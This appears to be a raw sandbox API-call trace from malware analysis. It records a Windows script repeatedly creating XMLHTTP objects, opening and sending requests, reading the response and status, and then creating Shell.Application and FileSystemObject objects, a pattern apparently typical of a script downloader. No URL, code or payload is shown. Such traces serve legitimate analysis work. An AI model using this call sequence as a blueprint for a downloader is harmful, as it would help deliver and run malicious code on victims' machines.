	[0726.236] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0726.236] XMLHTTPRequest:IUnknown:Release (This=0x49c74c8) returned 0x0
	[0726.236] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0726.236] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0726.236] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0726.236] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0726.236] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0726.236] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0726.236] SysStringLen (param_1=0x0) returned 0x0
	[0726.236] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0726.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0726.237] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5bb0) returned 0x0
	[0726.237] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0726.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0726.237] ??2@YAPEAX_K@Z () returned 0x62f310
	[0726.237] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0726.237] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0726.237] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0726.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5bb0) returned 0x0
	[0726.237] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5bb0) returned 0x3
	[0726.237] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0726.237] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5bb0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0726.238] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5bb0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0726.238] longjmp () 
	[0726.238] longjmp () 
	[0726.238] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0726.238] SysStringLen (param_1=0x0) returned 0x0
	[0726.238] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0726.238] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0726.238] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5b50) returned 0x0
	[0726.238] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0726.238] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c74c8) returned 0x0
	[0726.238] ??2@YAPEAX_K@Z () returned 0x62f330
	[0726.238] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c74c8, pUnkSite=0x62f330) 
	[0726.238] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0726.239] XMLHTTPRequest:IUnknown:Release (This=0x49c74c8) returned 0x0
	[0726.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5b50) returned 0x0
	[0726.239] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5b50) returned 0x3
	[0726.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0726.239] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5b50, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0726.239] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5b50, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0726.239] longjmp () 
	[0726.239] longjmp () 
	[0726.239] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0726.240] SysStringLen (param_1=0x0) returned 0x0
	[0726.240] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0726.240] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0726.240] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0726.240] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0726.240] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5c18) returned 0x0
	[0726.240] ??2@YAPEAX_K@Z () returned 0x62f310
	[0726.240] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5c18, pUnkSite=0x62f310) 
	[0726.240] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0726.240] XMLHTTPRequest:IUnknown:Release (This=0x49c5c18) returned 0x0
	[0726.240] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c5aa0) returned 0x0
	[0726.240] XMLHTTPRequest:IUnknown:AddRef (This=0x49c5aa0) returned 0x3
	[0726.240] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0726.241] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0726.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0726.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0726.241] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0726.241] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0726.705] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0726.706] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0726.706] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0726.706] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0726.706] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0726.706] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0726.706] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0726.706] SysStringLen (param_1=0x0) returned 0x0
	[0726.706] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0726.707] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0726.707] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x3967c0) returned 0x0
	[0726.707] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0726.707] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396800) returned 0x0
	[0726.707] ??2@YAPEAX_K@Z () returned 0x62f350
	[0726.707] Shell:IObjectWithSite:SetSite (This=0x396800, pUnkSite=0x62f350) returned 0x0
	[0726.707] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0726.707] Shell:IUnknown:Release (This=0x396800) returned 0x1
	[0726.707] Shell:IUnknown:QueryInterface (in: This=0x3967c0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x3967c0) returned 0x0
	[0726.707] Shell:IUnknown:AddRef (This=0x3967c0) returned 0x3
	[0726.707] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0726.707] SysStringLen (param_1=0x0) returned 0x0
	[0726.707] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0726.711] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0726.711] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0726.711] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0726.711] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0726.711] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0726.711] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0728.371] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0728.371] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c5aa0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0728.371] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0728.373] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0728.373] SysStringLen (param_1=0x0) returned 0x0
	[0728.373] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0728.373] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0728.373] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c5aa0) returned 0x0
	[0728.373] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0728.373] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c5aa0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0728.373] ??2@YAPEAX_K@Z () returned 0x62f310
